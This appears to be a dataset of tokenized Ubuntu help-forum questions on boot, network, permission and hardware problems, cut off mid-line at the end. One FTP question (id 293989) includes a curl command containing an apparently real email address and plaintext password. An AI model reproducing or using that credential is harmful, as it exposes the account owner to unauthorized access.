293795	bash permissions	my friend was trying to tighten up security on his ubuntu server and changed the permissions on bash . he logged out , and now the computer wo n't let him log back in . the server is an off-site server ( i believe it is running ubuntu 12.10 ) , so we only have command-line access to it . we ca n't actually see what is happening on screen until it has booted because of remote stuff , so we ca n't just tell it to go to root mode when it is booting . he says that we still the ability to ssh into the machine . right now when we try to login , it logs in , the immediately logs us back out . is there a way to log in directly as root , or tell ubuntu to run sh commands from the login page ?
293798	saving screenshots from before os is installed	i 'm doing an assignment which requires me to take screenshots of everything i do , including taking screenshots of using using the partition manager in the `` test '' version of ubuntu 12.10 . how can i permanently save these somewhere so i do n't lose them once i restart my computer to use the full version of ubuntu 12.10 ?
293802	can not get ubuntu 13.04 to load	i tried the automatic update , and it quit less than half way though . now 12 wo n't load without going through advanced options . i installed 13 on a separate partition , but from the loader , i get nothing but a flashing cursor and then a blank black screen . anybody have any ideas ?
293804	kde widget to hold a program	i am using kde default install on ubuntu 13.04 . is there a widget that will just hold a running program ? i will then , for instance , be able to run hamster-time-tracker in that widget and quickly access it by going to widget overview .
293808	wireless is connected but no access to internet 12.10	i got my wireless to work finally after initial issues . now i have moved locations , i ca n't get internet access . wireless is still connected but that is all . i am not tech savy nor ubuntu-savy so help is greatly appreciated . what do i need to do ? update : lo no wireless extensions . eth1 no wireless extensions . wlan1 iee bgn essid : '' westell7668 '' mode : manged frequency:2,437 ghz access point : 74:44:01 : ac:07 : b7 bit rate=18 mb/s tx-power=20dbm retry long limit:7 rts thr=2347 b fragment thr : off power management : off link quality=55/70 signal level=-55 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:16 missed beacon:0 update : i found out what it is . i had a network proxy on google.com .
293816	in virtualbox , how do i set up host-only virtual machines that can access the internet ?	in setting up virtual machines with virtualbox , i often want the following characteristics vm has a static ip host can access vm without port forwarding vm can access the internet i can move my laptop from network to network ( e.g . from home to office to coffeeshop ) without worrying about securing or reconfiguring the vm none of the virtualbox network connection methods staisfies these requirements on their own . nat requires port forwarding if you want to connect to the vm from the host . host-only the vm can not access the internet , unless the host is a router . bridged exposes the vm to the network ; not portable .
293818	ubuntu 13.04 & ehanced desktop zoom	with the new release of ubuntu 13.04 . does the sidebar and top bar enlarge now when you zoom in using the compiz enhanced desktop zoom . i saw that the new version uses unity 7 so i 'm really hoping the fixed this issue . thank you in advance !
293824	ubuntu for moto luxe	i have a moto luxe that i wish change because its too slow . can i change my android on a moto luxe cell phone for the ubuntu ? thanks
293827	error rtnetlink answers : file exists	on 12.04 , running as a guest in virtualbox using two adapters , i was getting this error in response to ifup eth1 rtnetlink answers : file exists failed to bring up eth1 this was the contents of /etc/network/interfaces # the loopback network interface auto lo iface lo inet loopback # host-only interface auto eth1 iface eth1 inet static address 192.168.56.20 netmask 255.255.255.0 network 192.168.56.0 broadcast 192.168.56.255 gateway 192.168.56.1 # nat interface auto eth2 iface eth2 inet dhcp see this question for more about why i configured it this way . in virtualbox , how do i set up host-only virtual machines that can access the internet ?
293829	windows does n't recognize external hard-drive after installing ubuntu ( on internal hard-drive )	i have installed ubuntu on my internal hard-drive using windows ubuntu installer and everything worked perfectly . i am able to run both windows7 and ubuntu . i also have an external hard-drive which i only keep for data . at first , i could access the data ( mainly pictures and music ) from both ubuntu and windows7 . now , when i open it in windows7 , it 's does n't show anything . it shows indeed that it 's half full but i see no folders or files . from ubuntu i can open it perfectly , no problems there . my question is : how can i make windows see the data from my hard-drive again ? i do n't really care about ubuntu recognizing it . i only use ubuntu for my homework . thank you in advance !
293830	how to recieve streamed audio with chromium in lubuntu ?	running lubuntu 13.04 fresh install . default chromium install fails on pls or m3u streaming audio , after attempting to install the plugin , due to following error : could not load mplayerplug-in is now gecko-mediaplayer 1.0.8 . update : 2013-11 using chromium version 30.0.1599.114 ubuntu 13.04 ( 30.0.1599.114-0ubuntu0.13.04.2 ) see plugins at chrome : //plugins/ ( according to https : //support.google.com/chrome/answer/142064 ? hl=en ) all of these plugins are listed using `` gecko media player 1.0.8 '' in chrome : //plugins/ realplayer 9 divx browser plug-in quicktime plug-in 7.6.9 windows media player plug-in including the oddly named mplayerplug-in is now gecko-mediaplayer 1.0.8 i also tried installing the vlc as @ qdoe suggested , but received the following error . could not load vlc web plugin . this now smells like a local plugin config issue if vlc is showing the same error .
293831	set path to include custom folders	i refer to help.ubuntu.com to set environment variables . i 'm required to set some variables ( griffon_home and groovy_home ) for a user and also i want to include bin folders to my path so i edited ~/.pam_environment as follows . lc_numeric=en_us.utf-8 lc_time=en_us.utf-8 lc_monetary=en_us.utf-8 lc_paper=en_us.utf-8 lc_name=en_us.utf-8 lc_address=en_us.utf-8 lc_telephone=en_us.utf-8 lc_measurement=en_us.utf-8 lc_identification=en_us.utf-8 papersize=letter java_home=/usr/lib/jvm/java-7-openjdk-amd64/ griffon_home=/opt/griffon groovy_home=/opt/groovy path= $ path : $ griffon_home/bin : $ groovy_home/bin and i executed following command source ~/.pam_environment after this , both griffon and groovy commands are included in my path but after i exit that terminal and reopen another terminal and try to execute groovy or griffon , both commands are not included in my path . but i 've found that the variable groovy_home and griffon_home are still set . how can i have my path to include the bin folders permanently ?
293834	dual boot windows 8 and ubuntu 13.04 on dell inspiron 15r 3521 in uefi mode	i have a dell inspiron 15r 3521 laptop come with windows 8 in built . i want to install ubuntu 13.04 in uefi mode to dual boot . i have read to much on this and looks like every machine or laptop behaves in different way due to difference in their uefi architecture with their processor . please help me in this regard so that i do n't want to screwed up with my current windowds 8 behaviour . guys your help appreciated : )
293838	shell script to conditionally add apt repository	i want to write a shell script that will add an apt repository . i know that i can do it using sudo add-apt-repository -y < repo > . my question is can i do it only if the repository was not added already , something like : if repo was not added yet : sudo add-apt-repository -y < repo > sudo apt-get update thanks
293840	error message when booting ubuntu on windows 8	i have installed ubuntu onto my lenevo idea-pad , and it says when i choose to boot ubuntu that its missing a file , or something . i free 'd up about fifteen gigs of memory for ubuntu to run but there is still this error message .
293845	mounting a pendrive as a swap partition , having problems	the building of one of the softwares i am installing is failing because of the error c++ : internal compiler error : killed ( program cc1plus ) i think this is because i have only 500mb swap partition . so i am trying to increase it using an external pendrive . i have tried adding /dev/sdb1 none swap sw 0 0 /dev/sdc1 none swap sw 0 0 ( since on booting , sometimes the pendrive partition shows /dev/sdb1 while sometimes it shows /dev/sdc1 ) to the /etc/fstab file but still instead of showing system as linux swap on using fdisk -l it is showing fat16 . i have also tried mkfs.ext3 /dev/sdb1 so that we create swap on a linux type filesystem , but it says : /dev/sdb1 is mounted ; will not make a filesystem here ! i also tried sudo swapon /dev/sdb1 but i get swapon : /dev/sdb1 : read swap header failed : invalid argument please guide me so that i can make a swap partition on my pendrive . ps : i have root permission .
293846	resize ubuntu side of dual boot uefi	i have a correctly running setup with dual-booted windows 8 and ubuntu 12.04 . however , i would like to increase the root `` partition '' on the ubuntu side , which has been complaining of low disk space . i have more than enough free unused space , but the microsoft reserved ( msr ) partition on the windows side kicks in once i boot into ubuntu . any help would be appreciated .
293849	apt-get 503 service unavailable	i 'm using my school network , and it seems that only apt-get is blocked , regardless of which server i use . pacman and rpmdrake work fine , both of which i 've tested with chakra and mageia respectively . how is this block executed ? is there a way to bypass this block without using a proxy ( proxy 's too slow ) ? thanks in advance .
293851	multiple gmail account notifier ubuntu 13.04	in 12.04 i used an app that used notifyosd to notify me if i got one of my three gmail accounts . and sadly i cant find it for 13.04 . both gm-notify and gm-notifier only works with 1 gmail acount . is there any notifier app that works with multiple gmail accounts and uses notofyosd ?
293854	missing libqt3-mt in 13.04	i have an application that requires the libqt3-mt package , in particular it 's asking for libqt-mt.so.3 . it worked ok under ubuntu 12.04 , but i 've recently upgraded to 13.04 and the package is missing here ( in synaptic package manager ) . could you please tell me how to fix it ?
293856	disabled expo plugin and my deskstop disappeared	i have disabled the expo plugin by ignoring the warning but now everything is gone from my desktop . there is no menu on the top or no sidebar . i am using commandline to open firefox and all . and also i have re-enabled expo plugin from ccsm but there is nothing . i also upgraded ubuntu by using sudo apt-get distro-upgrade but still there is nothing coming back . please give me the solution asap .
293858	background missing in loginscreen and in guest session .	yesterday i followed this answer on `` how do i add customized wallpapers so they appear in the dynamic unity greeter ? '' to make my wallpaper appear in the login screen . but instead of only changing the rights of the pictures i added to the /usr/share/backgrounds folder i also changed the rights of the pictures that were already in it ( the standard ubuntu 13.04 wallpapers ) ( i did this by using gksudo nautilus and then selecting all the pictures , right click -- > properties -- > permissions tab -- > read and right for me , read only for group and others ) now i have no wallpaper at all on the login screen ( it 's just purple with the white dots ) and in the guest session the wallpapers are missing too . i suppose the problem lies somewhere in the read and write rights i changed , but i do n't know what 's wrong with them . does anyone know how to solve this ? thanks
293859	how to make my own distro	i want to make my own ubuntu based distro which contain some moste usable software . and i want to it be bootable and i can give it to my friends to install it on their pcs ! but i do n't know how do this . and i checked the website of remistersys but it does n't load . what i have to do ?
293864	how can i prevent nautilus from showing search results ?	how can i prevent nautilus from showing search results ? first this is not for hiding .. you know . i want to hide my mmorpg so i am the only that can play it . is there a script , command , anything that can make nautilus stop from showing the results . e.g . : someone searched for a keyword and yes nautilus is searching for it , how can i fool that he/she that nautilus is going to show the result , but keep the result hidden .
293866	avconv how to copy all stream and merge metadata ( fix creation date ) ?	i am trying to fix the metadata of some old videos , so i would like to copy all streams audio video and subtitle and merge the metadata from a txt file . i first dump the metadata with : avconv -i out.mp4 -f ffmetadata metadata.txt and then try to copy with the metadata : avconv -i mov_0732.mp4 -f ffmetadata -i metadata.txt -c : v copy -c : a copy -c : s copy -map 0 out.mp4 but the final metadata is untouched , if i move the metadata arguments to the end avconv does not start : [ buffer @ 0x2128d40 ] w:1280 h:720 pixfmt : yuv420p [ mpeg4 @ 0x2124660 ] invalid pixel aspect ratio 65536/65536 , limit is 255/255 output # 0 , mp4 , to 'out.mp4 ' : metadata : major_brand : isom minor_version : 0 compatible_brands : isom3gp4 creation_time : 1947-03-24 14:12:20 stream # 0.0 ( eng ) : video : mpeg4 , yuv420p , 1280x720 [ par 65536:65536 dar 16:9 ] , q=2-31 , 200 kb/s , 90k tbn , 90k tbc metadata : creation_time : 1947-03-24 14:12:20 stream # 0.1 ( eng ) : audio : [ 0 ] [ 0 ] [ 0 ] [ 0 ] / 0x0000 , 48000 hz , mono , s16 , 200 kb/s metadata : creation_time : 1947-03-24 14:12:20 stream mapping : stream # 0:0 - > # 0:0 ( h264 - > mpeg4 ) stream # 0:1 - > # 0:1 ( aac - > libvo_aacenc ) error while opening encoder for output stream # 0:0 - maybe incorrect parameters such as bit_rate , rate , width or height
293869	how do i remove a partition from elements external hard-drive ?	the hard drive was partitioned to have a ubuntu iso boot as we did n't have a 2gb usb at the time to just put ubuntu on ( what a fail i know -.- ' ) . this partition was made with backtrack 5 kde r3 ( assuming this is why i ca n't find a way to get rid of it whatsoever on windows ) . i can see it on windows , along with another partition i want to remove ( 200gb linux-access-only hidden storage ) both are empty , but the main hard-drive is n't and there 's over 100+ gb of stuff on the main hard-drive and i do n't want to remove all of it ( waiting time issue to unload and reload files , ai n't nobody got no time for dat ) just to re-format the entire external drive all-together . ideas ?
293870	just installed ubuntu 12.04 . mouse drag and drop not fully functional . any known bugs ?	if i drag and drop sometimes doesnt work ( especially when i move the mouse fast ) . the thing i 'm dragging just stops if i move the mouse fast . in win7 is fine , so no hardware issues .
293874	what is the current stage of ubuntu tablet , is it viable to use with a android note 10.1 ?	i want to practise on ubuntu tablet os with my note 10.1 . is it possible to load it to my tabler as keepjng the android alive as backup. ? or is tblet os is not ready yet to load it into machine ? what is the present progress ?
293880	how to update an eol ubuntu distribution	i know that ubuntu 11.10 has reached eol status . but is there a way to have it updated up until the eol date of 5/9/2013 ? i have looked at this question , and it talks about how to get it done , but when i go to old releases , 11.10 is not listed . so is the fact that it just got eol status it needs a little time to move there or is there another way to have that update done ? the system is too old to have anything above 11.10 .
293884	external usb drive via virtualbox says it 's busy	when i try to access an external usb flash drive with my running ubuntu in virtualbox , by going to the devices - > usb section in the virtualbox menu , it complains that the device is busy with a previous request ( gives me a uuid number and some more details ) . not sure if this is because it 's automatically mounted by wwindows and i need to do something with it before being able to access it with
293886	internet problem in ubuntu 13.04	i just installed ubuntu 13.04 , and there is a problem with my wired internet connection . the weird thing is that it 's not a driver problem , i guess , because it connects to my router , but does not receive any response from other servers . the internet works just fine in windows 7 , or on my phone . here is a screenshot : i have a dell optiplex gx270 , and a serioux srx-wr150wh wifi router . /// edit here are the ouputs for cat /etc/resolv.conf : dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) do not edit this file by hand -- your changes will be overwritten nameserver 127.0.1.1 search srx and for route -n : kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.1.1 0.0.0.0 ug 0 0 0 eth0 169.254.0.0 0.0.0.0 255.255.0.0 u 1000 0 0 eth0 192.168.1.0 0.0.0.0 255.255.255.0 u 1 0 0 eth0 also , here is a screenshot with my connection information , and the output of ping 8.8.8.8 , which just goes on forever ( i stopped it at around 430 ) : thanks . ps i also tried running ubuntu 13.04 liveusb on my old laptop , and had the same results as with the computer , it connected to my router , but had no internet at all . outputs are the same .
293888	xubuntu 13.04 alsa control panel - hdmi output option gone from all sound control menus	my ati hdmi sound card use to show up in my control panel as an available output in alsa sound control panel . i 'm sure what i did , but it no longer shows up anymore . i 've tried a few terminal things to confirm the computer still recognizes that it 's there . i hook up my laptop to my tv to watch shows , but now i ca n't pipe my audio through my hdmi anymore . how can i get it back ?
293893	how to let pm-utils run automatically ?	i am using ubuntu 12.04 on a laptop . just want to let sudo pm-powersave true run automatically every time after login , but do n't know how . i tried the following approaches to let it run automatically i put the command in /etc/rc.local i write a upstart job in /etc/init/ i write a executable shell script , and add it to the startup applications unfortunately , all the above three methods failed . i am sure the above three methods have executed the command ( because i add another command touch test.txt , it works ) . so my doubt is that the command is not executed at the right time . for example , if the command runs earlier , some other commands may overlap it .
293896	ubuntu system totally freezes 12.04 12.10 13.04	this problem is an ongoing issue for me . maybe someone has an idea out there . i 've been using ubuntu 32 bit for years with much pleasure . it all stopped when i upgraded to version 12.04 . since then , the computer keeps freezing after different time intervals of useage , mouse , screen , keyboard - the only way to revive it is a hard reset . sometimes , while browsing the web ( via firefox or chrome ) , the system freezes , however it is a `` different freeze '' and i can use the combination of ctrl+alt+f2 to go into a terminal , type my user and password , followed by ctrl+alt+f7 to return to the gui interface . however , the interface is lacking the side taskbar and the upper statusbar - they do n't reappear until i force reboot via terminal . i must add that i 've installed fedora insted - hoping it will work properly - but the same thing happend with fedora ( latest version ) . made me think there is a problem either with my hardware configuration or with the kernel ( i do n't know whether fedora and ubuntu use the same kernel ) . i tried formatting the hard drive and reinstalling . the same problem occured . everything works fine with ubuntu 11.10 . it is only the later versions which present me with these freezing problems . my specs : intel core i5-2300 2.8ghz-3.1ghz 6mb cache 95w lga1155 desktop computer intel bearup lake dh67bl h67 lga1155 uatx sound & graphics cards - intel on board . 4gb memory 100tb hd thanks alot .
293898	nautilus bookmarks are missing since upgrade to 13.04	my bookmarks are not shown anymore after upgrading to 13.04 raring ringtails and i ca n't add any new bookmarks . the function is not shown and the shortcut ctrl+d is n't working either . is this functionality just gone for some reason ( as the split screen with f3 ) or is there something wrong with my upgrade ? thanks for any hints .
293901	installing python 3.2.x on 12.04	i 'm completely new to ubuntu ( and any os outside of windows ) . i would like to use my newly formatted and installed ubuntu desktop to code in python . the problem is , i do n't know how to install the version of python i would like to use ( > = 3.2 ) . i am running a 32 bit 12.04.2 lts install and i currently have python-3.2.4.tgz sitting in my downloads folder but i do not know where to go from here , please help .
293906	update from ubuntu 12.10 to 13	i have some problem about update ubuntu . once computer asked me to update version of ubuntu from 12.10 to 13.04 ( or 13 ... something like this ) . i click ok to update , but when the computer restarted again , it still was 12.10 ( until now ) , and the speaker does n't work , even i have tried everything with `` setting '' . sometimes the screen turns black automatically and i ca n't understand what 's written and what to do . i have to force shut down because nothing happen after the black screen . what 's happened ? how can i do with this ?
293920	does ubuntu phone os preview have email ( exchange and other ) support ?	i would like to know whether email ( exchange and other third party ) feature is working in the current release , or one coming at this months end .
293924	if condition on multiple lines in bash shell	i have a bash shell function that takes an argument and perform something on it if needed . do_somthing ( ) { if [ need to do something on $ 1 ] then do it return 0 else return 1 fi } i want to call this method with several arguments and check if at least one of them succeeded . i tried something like : if [ do_something `` arg1 '' || do_something `` arg2 '' || do_something `` arg3 '' ] then echo `` ok '' else echo `` not ok '' fi what will be the correct syntax for that ? edit also - i want to make sure that even if the first condition is true all other conditions will still be evaluated . thanks ,
293925	brightness buttons not working properly	after upgrading from 12.10 to 13.04 the brightness control buttons on my laptop ( lenovo e430 ) are not working properly - when i try to brighten the screen , nothing happens , but when i try to dim the screen , the screen immediately dims to the lowest possible setting . i am then not able to change the brightness back up with the brightness control buttons and have to open brightness & lock settings to set it back up , where it works ...
293926	brightness settings not ajustable	i gave it a search and found this for version 11.04 on an acer aspire ; sudo gedit /etc/default/grub edit two lines to read as follows : grub_cmdline_linux_default= '' quiet splash acpi_backlight=vendor grub_cmdline_linux= '' acpi_osi=linux sudo update-grub i am confident i executed it correctly but it had no effect . however i have no experience with ubuntu and this is the first thing iâve tried to fix before doing anything else . so please keep replies as descriptive as possible . am running an acer aspire v3- # # # g ( not sure of numbers 871 maybe ? ? ) with ubuntu 13.04 . all help appreciated .
293927	ca n't unblock rfkill internal wifi , but usb wifi does n't work either	sometimes the internal wifi on my amilo pi 2515 is disabled and ca n't be enabled using the hardware switch ( in bios too ) , since the device is a bit dated and this only occurred recently , i 'm assuming a hardware issue . so i tried using a usb wifi dongle instead , but that gets disabled too . 0 : phy0 : wireless lan soft blocked : no hard blocked : yes 1 : phy1 : wireless lan soft blocked : no hard blocked : no rfkill unblock all does not change anything . is there some way to ignore rfkill altogether ?
293929	getting vi to auto syntax highlight and autoindent	i prefer using vi from tty1 as i hate gui . i 've just begun programming in c and would like to know how to get vi to auto indent for me . i would like the following code to appear just like the way i 've typed with proper tab space . # include < stdio.h > int main ( ) { printf ( `` hello.\n '' ) ; return 0 ; }
293931	just installed ubuntu 13.04 alongside windows 7 . unable to boot ubuntu	when i start my computer , windows 7 boots up as it would usually do before i installed ubuntu . so , it is not giving me an option to boot ubuntu instead of windows . i have windows 7 professional 64-bit installed and just installed the 64-bit version of ubuntu 13.04 . when installing ubuntu on computers in the past , it provides a boot selection menu to select which os to boot . in my case , it goes straight into booting windows . i 've tried going into the f12 boot menu but there is nothing helpful to select . solution : found this page on the ubuntu site . https : //help.ubuntu.com/community/boot-repair it involves using boot-repair as was also suggested below .
293933	caps-lock remaps to esc does n't desactivate the capslocking	i 'm the happy owner of a asus zenbook prime ux31a-r4005p running kubuntu 13.04 . i 'm also a happy vim user , that mean i 'm lazy and do n't like for my hands to move more than they should . i did remap my caps-lock key to esc with xmodmap with the following command xmodmap -e 'clear lock ' -e 'keycode 0x42 = escape' this works on several computers but on my zenbook , esc is sended and the caps-lock is activated . i could double press the caps-lock key to work around the problem but it kind of defeat the purpose . ; ) any help is appreciated .
293938	ubuntu 12.04 has experienced an internal error . - > executablepath /usr/bin/lsb_release	running ubuntu 12.04 32-bit . recently i start seeing this internal error any time after i open the terminal and today after i opened a file in gedit . could anybody explain me what cause the error and a possible fix . - > executablepath : /usr/bin/lsb_release - > package : lsb-release 4.0-0ubuntu20.2 - > problemtype : crash - > title : lsb_release crashed with ioerror in getstatusoutput ( ) : [ errno 10 ] no child processes ... this is just a part of the error report problem box , ca n't upload screenshot ( not enough reputation ) any help on this is appreciated .
293940	disable pad click on 12.04 - driver problem ?	i 'd like to disable pad click . usually it was possible in system settings under mouse and touch pad , but in ubuntu 12.04 i ca n't see `` touch pad '' in mouse and touch pad settings ... i 've installed touchpad-indicator but it seems it 's not what i wanted . i do n't want to disable the touchpad , just the pad click . is it possible that the system lacks the drivers for the touchpad ? how can i check it ? i ca n't see the touchpad with system settings > mouse and touchpad ( there is only `` mouse '' ) , with synaptiks nor with pointing devices . thanks
293947	mp3 mixing program	is there a mixing program that exist for mixing mp3/wav files like for example virtualdj or tracktor for linux ubuntu ?
293948	where to find older source & binary package versions ?	i know that when a package update appears in the repository , its older version disappears from there . but what if new version has a regression ? where can i find previous ones ? note : i do n't mean package from older distro release or anything like that . i mean the version directly preceding current , e.g . if wine-1.5.29 is current , i need wine-1.5.28 and maybe earlier ones . of course , wine is a bad example since i can find any version on their website , but this is n't the case for all packages . searching in /var/cache/apt/archives is not an option because it may be occasionally cleaned by apt-get clean .
293958	500 gb hard disk showing only 465 gb after installing ubuntu 13.04 alongside windows 7 and then formatting the whole drive	tried to install ubuntu alongside windows 7 . i formatted my hard drive a couple of times to make both the oss work together . but now when i tried to format the whole 500 gb hard drive to install windows 7 , its showing the total space of my hard drive as only 465 gb . the rest of the 35 gb is not visible even after deleting all the partitions and then making the whole volume unallocated and then re-partitioning using windows 7 live usb . i even tried to partition using the gpart in ubuntu 13.04 live usb but the hard drive space is still visible as 465 gb . i also tried to fix the boot with with the boot repair . it still did n't work . i had tried to install ubuntu 12.10 in one of many formatting procedures and had installed it alongside windows and both worked well together and the space allocated to it was around 34 gb . i was able to run it from the grub bootloader but i was unable to see the space allocated for that in the windows hard drive partitioner . my strong assumption is that , the 35 gb which is invisible has ubuntu installed in it . i formatted the whole drive and then tried to start the computer again , and then the grub rescue came up . i tried the boot repair but the procedure was completed without making any changes . i would appreciate all the help i can get to retrieve my lost hard disk space do that i can install windows 7 alone .
293970	default keyboard brightness is not working	i am running ubuntu 13.04 64-bit on an asus ux31a . to control the default screen and keyboard brightness after the start , i wrote this to the rc.local : echo 0 > /sys/class/backlight/acpi_video0/brightness # echo 0 > /sys/devices/platform/asus-nb-wmi/leds/asus : :kbd_backlight/brightness exit 0 the screen brightness is perfectly adjusted after every restart , but the keyboard backlight wo n't work . it 's always at 100 % and if i uncomment the second line the screen brightness wo n't work , too . seems like the permission is denied or the script ca n't access the file , because the path is totally correct . any tips ?
293974	how i can report ubuntu about issues in new ubuntu version 13.04-64	i am using ubuntu since 11.04 . the newest version 13.04 blockades the use with many issues . i want to tell them all to get a better useful ubuntu version in the future . is this side the right one ? for example some new installed aplications are not starting . or about the new changes , how useful they are
293976	i am trying to install ubuntu 13.04 amd-64 desktop on my pc with dual boot..,	i am trying to install ubuntu 13.04 amd-64 desktop on my pc with dual boot.. , i do n't know how to make it as bootable that ubuntu 13.04 iso. , so i am trying to install that one by using wubi installer . then it shows me an error message like `` could n't retrive the disk image files '' , and it was not at all installing . will any one have any idea about this .
293984	ram slot free or not	this question might not be so relevant here , but i want to know if there is some command tool that gives me the currently available ram slots in my machine , also if any of them is free , and information of the reserved slots . since i want to extend the ram of my system , i need to know if there is a free ram slot in my computer . kindly help .
293985	what are the new nautilus ( 3.6 ) shortcuts in ubuntu 13.04 ?	i post this question since new nautilus is very 'keyboard unfriendly ' , specially for one-key shortcuts . from 3.4 to 3.6 the very useful 'backspace ' shortcut to go to parent directory has gone ( along many other features ) . in particular i would like to know how to go to the parent directory .
293986	ca n't share zfs filesystem over nfs	ubuntu server 13.04 . client openelec 3.02 trying to share thru built-in into zfs sharenfs server ( 192.168.1.56 ) administrator @ ubuntu : ~ $ sudo zfs get all | grep share [ sudo ] password for administrator : zfs sharenfs on local zfs sharesmb off default zfs/media sharenfs rw= @ 192.168.1.0/24 local zfs/media sharesmb off default client ( ( 192.168.1.30 ) openelec : / # mount -t nfs 192.168.1.56 : /mnt/media /storage/mnt/media mount : rpc : remote system error - connection refused mount : mounting 192.168.1.56 : /mnt/media on /storage/mnt/media failed : bad file descriptor
293989	can not connect via ftp over explicit tls/ssl	i have been rather desperate trying to connect via ftp over explicit tls/ssl . i am following this manual : http : //repeatexplorer.umbr.cas.cz/static/html/help/manual.html # using-ftp here is what i tried : 1. curl -t bar.pdf -k -v -- ftp-ssl -u michalovova.monika @ gmail.com : borisv ftp : //repeatexplorer.umbr.cas.cz > pbsz 0 < 200 pbsz 0 successful > prot p < 200 protection set to private > pwd < 257 `` / '' is the current directory * entry path is '/' > epsv * connect data stream passively 0 0 0 0 0 0 0 0 -- : -- : -- 0:00:01 -- : -- : -- 0 < 229 entering extended passive mode ( |||36950| ) 0 0 0 0 0 0 0 0 -- : -- : -- 0:01:04 -- : -- : -- 0connection timed out * could n't connect to host * got positive epsv response , but ca n't connect . disabling epsv > pasv < 227 entering passive mode ( 192,168,0,201,144,2 ) . 0 0 0 0 0 0 0 0 -- : -- : -- 0:02:08 -- : -- : -- 0connection timed out * could n't connect to host 0 0 0 0 0 0 0 0 -- : -- : -- 0:02:08 -- : -- : -- 0 * closing connection # 0 * sslv3 , tls alert , client hello ( 1 ) : } [ data not shown ] curl : ( 7 ) could n't connect to host filezilla status : resolving address of repeatexplorer.umbr.cas.cz status : connecting to 147.231.252.6:990 ... error : connection timed out error : could not connect to server ftp-ssl repeatexplorer.umbr.cas.cz connected to galaxy.umbr.cas.cz . 220 proftpd 1.3.4a server ( public galaxy ftp ) [ 192.168.0.201 ] name ( repeatexplorer.umbr.cas.cz : louna ) : mich 234 auth ssl successful [ ssl cipher dhe-rsa-aes256-sha ] 331 password required for mich password : 230 user mich logged in remote system type is unix . using binary mode to transfer files . ftp > ls 200 port command successful 425 unable to build data connection : connection timed out any idea what would be easiest way to connect to that server ? thanks a lot .
293990	mount to an existing ubuntu server os	i currently have ubuntu server installed on an ext4 partition which contains the root file system . i wanted to separate /var out to its own partition . so i booted gparted live , created another ext4 partition and then booted ubuntu server , and selected that partition and selected /var as the mount point of that partition . but when i selected `` finish partitioning and write changes to disc '' , i get a red screen that says `` no root filesystem is defined . please correct this from the partitioning menu '' . but i do n't want this partition to have a root file system . i just want the sda1 root file system with os installed to use /var from this partition .
293992	help with boot screen	i want to have a different boot screen when i start my computer right now it just is a black screen saying starting this and starting that blah blah . i really want to have a graphic design like the ubuntu logo spinning in the example ubuntu files . is there a way to do this ? thanks in advance .
293993	open ports for development purposes	i 'm doing some java me development in my brand-new ubuntu laptop , coming from a now replaced windows vista one . what i 'm trying to do is run a mobile simulator that acts as an http server -receives connections to port 80- and run another one that acts as a client , executing both at the same time . in windows vista , this works without problem , when i port mi code windows 7 i need to turn firewall down to make that happen . however , now in my ubuntu laptop i 'm not able to get that working . i 'm been reading some posts that unix systems does n't need a firewall because several ports are blocked by default , so my question is how can i open this ports to continue development . i 'll be making also sms requests and bluetooth ones , so i 'd like that any request from localhost to localhost is not blocked . sytem : dell inspiron running ubuntu 11.1 64 bits . development is made in netbeans using jdk 1.7 32bits update : as requested , here 's the stack trace : java.io.ioexception : serversocket open at com.sun.midp.io.j2me.serversocket.socket.open ( socket.java:69 ) at com.sun.midp.io.j2me.socket.protocol.openprim ( protocol.java:128 ) at javax.microedition.io.connector.openprim ( connector.java:329 ) at javax.microedition.io.connector.open ( connector.java:222 ) at javax.microedition.io.connector.open ( connector.java:198 ) at javax.microedition.io.connector.open ( connector.java:180 ) at pe.edu.pucp.teleprocesamiento.server.http.httpconnectionprocessor.run ( httpconnectionprocessor.java:43 ) and also iptables -l -nv output : chain input ( policy accept 35777 packets , 34m bytes ) pkts bytes target prot opt in out source destination 35779 34m ufw-before-logging-input all -- * * 0.0.0.0/0 0.0.0.0/0 35779 34m ufw-before-input all -- * * 0.0.0.0/0 0.0.0.0/0 35777 34m ufw-after-input all -- * * 0.0.0.0/0 0.0.0.0/0 35777 34m ufw-after-logging-input all -- * * 0.0.0.0/0 0.0.0.0/0 35777 34m ufw-reject-input all -- * * 0.0.0.0/0 0.0.0.0/0 35777 34m ufw-track-input all -- * * 0.0.0.0/0 0.0.0.0/0 chain forward ( policy accept 0 packets , 0 bytes ) pkts bytes target prot opt in out source destination 0 0 ufw-before-logging-forward all -- * * 0.0.0.0/0 0.0.0.0/0 0 0 ufw-before-forward all -- * * 0.0.0.0/0 0.0.0.0/0 0 0 ufw-after-forward all -- * * 0.0.0.0/0 0.0.0.0/0 0 0 ufw-after-logging-forward all -- * * 0.0.0.0/0 0.0.0.0/0 0 0 ufw-reject-forward all -- * * 0.0.0.0/0 0.0.0.0/0 chain output ( policy accept 31810 packets , 3935k bytes ) pkts bytes target prot opt in out source destination 31812 3935k ufw-before-logging-output all -- * * 0.0.0.0/0 0.0.0.0/0 31812 3935k ufw-before-output all -- * * 0.0.0.0/0 0.0.0.0/0 31812 3935k ufw-after-output all -- * * 0.0.0.0/0 0.0.0.0/0 31812 3935k ufw-after-logging-output all -- * * 0.0.0.0/0 0.0.0.0/0 31812 3935k ufw-reject-output all -- * * 0.0.0.0/0 0.0.0.0/0 31812 3935k ufw-track-output all -- * * 0.0.0.0/0 0.0.0.0/0 chain ufw-after-forward ( 1 references ) pkts bytes target prot opt in out source destination chain ufw-after-input ( 1 references ) pkts bytes target prot opt in out source destination chain ufw-after-logging-forward ( 1 references ) pkts bytes target prot opt in out source destination chain ufw-after-logging-input ( 1 references ) pkts bytes target prot opt in out source destination chain ufw-after-logging-output ( 1 references ) pkts bytes target prot opt in out source destination chain ufw-after-output ( 1 references ) pkts bytes target prot opt in out source destination chain ufw-before-forward ( 1 references ) pkts bytes target prot opt in out source destination chain ufw-before-input ( 1 references ) pkts bytes target prot opt in out source destination chain ufw-before-logging-forward ( 1 references ) pkts bytes target prot opt in out source destination chain ufw-before-logging-input ( 1 references ) pkts bytes target prot opt in out source destination chain ufw-before-logging-output ( 1 references ) pkts bytes target prot opt in out source destination chain ufw-before-output ( 1 references ) pkts bytes target prot opt in out source destination chain ufw-reject-forward ( 1 references ) pkts bytes target prot opt in out source destination chain ufw-reject-input ( 1 references ) pkts bytes target prot opt in out source destination chain ufw-reject-output ( 1 references ) pkts bytes target prot opt in out source destination chain ufw-track-input ( 1 